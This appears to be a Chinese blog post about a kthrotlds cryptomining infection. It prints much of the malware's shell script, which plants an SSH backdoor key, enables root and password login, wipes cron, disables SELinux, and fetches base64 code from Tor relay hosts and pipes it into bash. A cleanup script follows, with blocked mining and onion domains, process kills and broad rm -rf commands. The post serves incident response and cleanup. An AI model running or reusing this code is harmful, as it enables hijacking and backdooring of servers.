${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "bash"|grep -v "ssh"|grep -v ".ntp"|grep -i " sh\|kworkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done

hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|awk '{if($3>=54.0) print $11}'|head -n 1)

[ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep "xmr\|${hload}"|while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; fi; done; }

#${sudo} pkill sleep >/dev/null 2>&1

#loop=$(ps -eo ppid,comm|grep -v grep|grep -i ' sleep'|awk '{print $1}'|uniq)

#if [ "${loop}" != "" ]; then for p in ${loop}; do if [ $p -gt 301 ] && [ $p -ne $$ ] && [ $p -ne $PPID ]; then $sudo kill -9 $p; $sudo pkill -P $p; fi; done; fi

hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $2}'|uniq)

if [ "${hload2}" != "" ]; then

? ? for p in ${hload2}; do

? ? ? ? xm=''

? ? ? ? if [ $p -gt 301 ]; then

? ? ? ? ? ? if [ -f /proc/${p}/exe ]; then

? ? ? ? ? ? ? ? xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"

? ? ? ? ? ? ? ? xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>/dev/null)

? ? ? ? ? ? elif [ -f /proc/${p}/comm ]; then

? ? ? ? ? ? ? ? xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"

? ? ? ? ? ? ? ? xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)

? ? ? ? ? ? fi

? ? ? ? ? ? if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} rm -rf "${xmf}" >/dev/null 2>&1; fi

? ? ? ? fi

? ? done

others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $11}')

if [ "${others}" != "" ]; then

? ? for o in ${others}; do

? ? ? ? okill=0

? ? ? ? if [ -f "${o}" ]; then

? ? ? ? ? ? if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi

? ? ? ? ? ? if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi

? ? ? ? ? ? if [ ${okill} -eq 1 ]; then

? ? ? ? ? ? ? ? ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done

? ? ? ? ? ? ? ? ${sudo} chattr -i -a "${o}" >/dev/null 2>&1; rm -rf "${o}" >/dev/null 2>&1

? ? ? ? ? ? fi

? ? ? ? fi

? ? done

net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip)

if echo "${net}"|grep -q 'Could not resolve proxy'; then

? ? unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY

? ? http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""

if [ ${sudoer} -eq 1 ]; then

? ? if [ -f /etc/ld.so.preload ]; then

? ? ? ? if [ $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload >/dev/null 2>&1; fi

? ? ? ? ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1

? ? ? ? >/tmp/.ld.so >/dev/null 2>&1

? ? ? ? ${sudo} rm -rf /etc/ld.so.preload* >/dev/null 2>&1

? ? fi

? ? #${sudo} find / -name ld.so.preload* -exec ${sudo} rm -rf {} \;

? ? if [ -d /etc/systemd/system/ ]; then ${sudo} rm -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi

? ? [ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }

? ? [ $(${sudo} cat /etc/hosts|grep -i "busybox"|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/busybox$/d' /etc/hosts >/dev/null 2>&1; }

? ? [ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} echo '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }

? ? if [ -f /usr/bin/yum ]; then

? ? ? ? if [ -f /usr/bin/systemctl ]; then

? ? ? ? ? ? crstart="systemctl restart crond.service >/dev/null 2>&1"

? ? ? ? ? ? crstop="systemctl stop crond.service >/dev/null 2>&1"

? ? ? ? else

? ? ? ? ? ? crstart="/etc/init.d/crond restart >/dev/null 2>&1"

? ? ? ? ? ? crstop="/etc/init.d/crond stop >/dev/null 2>&1"

? ? ? ? fi

? ? elif [ -f /usr/bin/apt-get ]; then

? ? ? ? crstart="service cron restart >/dev/null 2>&1"

? ? ? ? crstop="service cron stop >/dev/null 2>&1"

? ? elif [ -f /usr/bin/pacman ]; then

? ? ? ? crstart="/etc/rc.d/cronie restart >/dev/null 2>&1"

? ? ? ? crstop="/etc/rc.d/cronie stop >/dev/null 2>&1"

? ? elif [ -f /sbin/apk ]; then

? ? ? ? crstart="/etc/init.d/crond restart >/dev/null 2>&1"

? ? ? ? crstop="/etc/init.d/crond stop >/dev/null 2>&1"

? ? fi

? ? if [ ! -f "${LPATH}.sysud" ] || [ $(bash --version 2>/dev/null|wc -l) -eq 0 ] || [ $(wget --version 2>/dev/null|wc -l) -eq 0 ]; then

? ? ? ? if [ -f /usr/bin/yum ]; then

? ? ? ? ? ? yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie >/dev/null 2>&1

? ? ? ? ? ? yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie >/dev/null 2>&1

? ? ? ? ? ? chkconfig sshd on >/dev/null 2>&1

? ? ? ? ? ? chkconfig crond on >/dev/null 2>&1;

? ? ? ? ? ? if [ -f /usr/bin/systemctl ]; then

? ? ? ? ? ? ? ? systemctl start sshd.service >/dev/null 2>&1

? ? ? ? ? ? else

? ? ? ? ? ? ? ? /etc/init.d/sshd start >/dev/null 2>&1

? ? ? ? ? ? fi

? ? ? ? elif [ -f /usr/bin/apt-get ]; then

? ? ? ? ? ? rs=$(yes | ${sudo} apt-get update >/dev/null 2>&1)

? ? ? ? ? ? if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi

? ? ? ? ? ? DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools >/dev/null 2>&1

? ? ? ? ? ? DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron

? ? ? ? ? ? ${sudo} systemctl enable ssh

? ? ? ? ? ? ${sudo} systemctl enable cron

? ? ? ? ? ? ${sudo} /etc/init.d/ssh restart >/dev/null 2>&1

? ? ? ? elif [ -f /usr/bin/pacman ]; then

? ? ? ? ? ? pacman -Syy >/dev/null 2>&1

? ? ? ? ? ? pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools >/dev/null 2>&1

? ? ? ? ? ? systemctl enable --now cronie.service >/dev/null 2>&1

? ? ? ? ? ? systemctl enable --now sshd.service >/dev/null 2>&1

? ? ? ? ? ? /etc/rc.d/sshd restart >/dev/null 2>&1

? ? ? ? elif [ -f /sbin/apk ]; then

? ? ? ? ? ? #apk --no-cache -f upgrade >/dev/null 2>&1

? ? ? ? ? ? apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc >/dev/null 2>&1

? ? ? ? ? ? apk del openssl-dev net-tools >/dev/null 2>&1; apk del libuv-dev >/dev/null 2>&1;

? ? ? ? ? ? apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main >/dev/null 2>&1

? ? ? ? ? ? rc-update add sshd >/dev/null 2>&1

? ? ? ? ? ? /etc/init.d/sshd start >/dev/null 2>&1

? ? ? ? ? ? if [ -f /etc/init.d/crond ]; then rc-update add crond >/dev/null 2>&1; /etc/init.d/crond restart >/dev/null 2>&1; else /usr/sbin/crond -c /etc/crontabs >/dev/null 2>&1; fi

? ? ? ? fi

? ? fi

? ? ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1

? ? ${sudo} rm -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} rm -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/.* >/dev/null 2>&1;

? ? ${sudo} chattr -i -a /etc/cron.hourly >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.hourly/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.daily >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.daily/ >/dev/null 2>&1

? ? ${sudo} rm -rf /etc/cron.hourly/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.hourly/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/.* >/dev/null 2>&1;

? ? ${sudo} chattr -a -i /tmp >/dev/null 2>&1; ${sudo} rm -rf /tmp/* >/dev/null 2>&1; ${sudo} rm -rf /tmp/.* >/dev/null 2>&1

? ? ${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/root >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/crontabs/root >/dev/null 2>&1

? ? if [ -f /sbin/apk ]; then

? ? ? ? ${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/crontabs/* >/dev/null 2>&1

? ? ? ? ${sudo} rm -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo "${C1}" > /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo "${C2}" >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo '' >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} crontab /etc/crontabs/root

? ? elif [ -f /usr/bin/apt-get ]; then

? ? ? ? ${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1

? ? ? ? rs=$(${sudo} echo "${C1}" > /var/spool/cron/crontabs/root 2>&1)

? ? ? ? if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/crontabs/root && ${sudo} crontab /var/spool/cron/crontabs/root; fi

? ? else

? ? ? ? ${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1

? ? ? ? rs=$(${sudo} echo "${C1}" > /var/spool/cron/root 2>&1)

? ? ? ? if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root; fi

? ? fi

? ? ${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo "${C2}" > /etc/crontab 2>&1)

? ? if [ -z "${rs}" ]; then ${sudo} echo '' >> /etc/crontab && ${sudo} crontab /etc/crontab; fi

? ? ${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1

? ? rs=$(${sudo} echo "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo '' >> /etc/cron.d/root 2>&1)

? ? if [ $(crontab -l 2>/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then

? ? ? ? (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) && chmod +x ${LPATH}.rm

? ? ? ? (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) && chmod +x ${LPATH}.cd

? ? ? ? (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) && chmod +x ${LPATH}.ct

? ? ? ? if [ -f ${LPATH}.rm ] && [ -f ${LPATH}.ct ]; then

? ? ? ? ? ? ${sudo} "${crstop}"

? ? ? ? ? ? cd=$(which crond)

? ? ? ? ? ? ct=$(which crontab)

? ? ? ? ? ? #if [ -n "${cd}" ]; then ${sudo} ${LPATH}.rm ${cd}; ${sudo} cp ${LPATH}.cd ${cd}; fi

? ? ? ? ? ? if [ -n "${ct}" ]; then ${sudo} ${LPATH}.rm ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi

? ? ? ? ? ? ${sudo} "${crstart}"

? ? ? ? fi

? ? fi

? ? ${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1

? ? if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi

? ? ${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1

? ? if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi

? ? if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then? ${sudo} echo "${skey}" >> ${sshdir}/authorized_keys; fi

? ? ${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} rm -rf ${sshdir}/authorized_keys* >/dev/null 2>&1

? ? [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] && { ${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config; }

? ? [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] && { ${sudo} echo RSAAuthentication yes >> /etc/ssh/sshd_config; }

? ? [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] && { ${sudo} echo PubkeyAuthentication yes >> /etc/ssh/sshd_config; }

? ? [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] && { ${sudo} echo UsePAM yes >> /etc/ssh/sshd_config; }

? ? [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] && { ${sudo} echo PasswordAuthentication yes >> /etc/ssh/sshd_config; }

? ? touch "${LPATH}.sysud"

else

? ? if [ $(which crontab|wc -l) -ne 0 ]; then

? ? ? ? crontab -r >/dev/null 2>&1

? ? ? ? (crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -

? ? fi

rm -rf ./main* >/dev/null 2>&1

rm -rf ./*.ico* >/dev/null 2>&1

rm -rf ./r64* >/dev/null 2>&1

rm -rf ./r32* >/dev/null 2>&1

echo -e '\n'

(${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash)

if [ ${sudoer} -eq 1 ]; then

? ? if echo "$(${sudo} cat /etc/selinux/config 2>/dev/null|grep "SELINUX="|tail -n 1)"|grep -q 'enforcing'; then

? ? ? ? ${sudo} sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || { echo "SELinux could not be disabled. Exiting."; exit; }

? ? ? ? ${sudo} shutdown -r now >/dev/null 2>&1

? ? ? ? ${sudo} reboot -f >/dev/null 2>&1

? ? fi

? ? if echo "$(sestatus -v? 2>/dev/null| head -n 1)"|grep -q 'enabled'; then ${sudo} shutdown -r now >/dev/null 2>&1; ${sudo} reboot -f >/dev/null 2>&1; fi

```

這是一段200多行的shell腳本代碼序苏，沒完全看懂，

大概能看到的是redis的6379端口判斷密碼捷凄，

屏蔽一些關(guān)鍵linux命令忱详，

攻擊后發(fā)起端口掃描其他機(jī)器等。

代碼雖然有了跺涤，怎么能完全清除還不知道：(

記錄一下匈睁。

kthrotlds挖礦病毒。

update:終于清掉了钦铁。

清理腳本(綜合了網(wǎng)上的一些)：

service crond stop

systemctl stop crond

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP

iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP? ?

iptables -A INPUT -s an7kmd2wp4xo7hpr.tor2web.su -j DROP

iptables -A OUTPUT -d an7kmd2wp4xo7hpr.tor2web.su -j DROP? ?

iptables -A INPUT -s an7kmd2wp4xo7hpr.tor2web.io -j DROP

iptables -A OUTPUT -d an7kmd2wp4xo7hpr.tor2web.io -j DROP? ?

iptables -A INPUT -s an7kmd2wp4xo7hpr.onion.sh -j DROP

iptables -A OUTPUT -d an7kmd2wp4xo7hpr.onion.sh -j DROP? ?

busybox echo -e "\n0.0.0.0 an7kmd2wp4xo7hpr.tor2web.su\n0.0.0.0 an7kmd2wp4xo7hpr.tor2web.io\n0.0.0.0 an7kmd2wp4xo7hpr.onion.sh" >> /etc/hosts

busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts

busybox rm -f /usr/local/lib/libioset.so

busybox rm /usr/local/lib/libcset.so

chattr -i /etc/ld.so.preload && busybox rm -f /etc/ld.so.preload

busybox rm -f /etc/ld.so.cache

lsof |grep usr/local/lib/libioset.so

echo $LD_PRELOAD

rm -rf /usr/sbin/kerberods

rm -rf /etc/init.d/netdns

rm -rf /etc/rc.d/rc0.d/K01netdns

rm -rf /etc/rc.d/rc1.d/K01netdns

rm -rf /etc/rc.d/rc2.d/S99netdns

rm -rf /etc/rc.d/rc3.d/S99netdns

rm -rf /etc/rc.d/rc4.d/S99netdns

rm -rf /etc/rc.d/rc5.d/S99netdns

rm -rf /etc/rc.d/rc6.d/K01netdns

rm -rf /etc/systemd/system/multi-user.target.wants/netdns.service

rm -rf /usr/lib/systemd/system/netdns.servic

rm -rf /usr/sbin/kerberods

rm -rf /etc/init.d/netdns

rm -rf /etc/rc.d/rc0.d/K*

rm -rf /etc/rc.d/rc1.d/K*

rm -rf /etc/rc.d/rc2.d/S*

rm -rf /etc/rc.d/rc3.d/S*

rm -rf /etc/rc.d/rc4.d/S*

rm -rf /etc/rc.d/rc5.d/S*

rm -rf /etc/rc.d/rc6.d/K*

rm -rf /etc/systemd/system/multi-user.target.wants/netdns.service

rm -rf /usr/lib/systemd/system/netdns.servic

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9

ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9

ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "ksoftirqds" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "watchdogs" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "kthrotlds" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "kerberods" | awk '{print $2}'|xargs kill -9

ps aux|grep an7kmd2wp4xo7hpr|grep -v grep |awk '{print $2}'|xargs kill -9

busybox pkill watchdogs

busybox pkill ksoftirqds

busybox pkill kthrotlds

#find / -mtime +10 -a -mtime -50 -type f |more

busybox rm /sbin/watchdogs

busybox rm /usr/sbin/watchdogs

busybox rm /usr/sbin/kthrotlds

busybox rm /usr/sbin/ntpd

busybox rm /etc/init.d/watchdogs

busybox chattr -i? /usr/bin/kerberods && busybox rm -rf /usr/bin/kerberods

busybox chattr -i? /tmp && busybox rm -rf /tmp

busybox chattr -i? ~/.ntp && busybox rm -rf ~/.ntp

busybox chattr -i? ~/.cache && busybox rm -rf ~/.cache

busybox chattr -i? /.cache/* && busybox rm -rf /.cache

busybox chattr -i? /.cache/.kswapd && busybox rm -rf /.cache/.kswapd

busybox chattr -i? /var/spool/cron/root && busybox rm /var/spool/cron/root && busybox touch /var/spool/cron/root && busybox chattr +i? /var/spool/cron/root

busybox chattr -i? /var/spool/cron/crontabs/root && busybox rm /var/spool/cron/crontabs/root && busybox touch /var/spool/cron/crontabs/root && busybox chattr -i /var/spool/cron/crontabs/root

busybox chattr -i? /etc/cron.d/root && busybox rm /etc/cron.d/root && busybox touch /etc/cron.d/root && busybox chattr +i /etc/cron.d/root

busybox chattr -i? /etc/cron.d/* && busybox rm -f /etc/cron.d/*

busybox chattr -i? /etc/cron.hourly/* && busybox rm -f /etc/cron.hourly/*

busybox chattr -i? /etc/cron.daily/* && busybox rm -f /etc/cron.daily/*

busybox chattr -i? /etc/cron.monthly/* && busybox rm -f /etc/cron.monthly/*

busybox chattr -i? /etc/cron.weekly/* && busybox rm -f /etc/cron.weekly/*

busybox find / -type f -name '*watchdogs*' | busybox xargs rm -f

busybox find / -type f -name '*kthrotlds*' | busybox xargs rm -f

busybox pkill watchdogs

busybox pkill ksoftirqds

busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9

busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9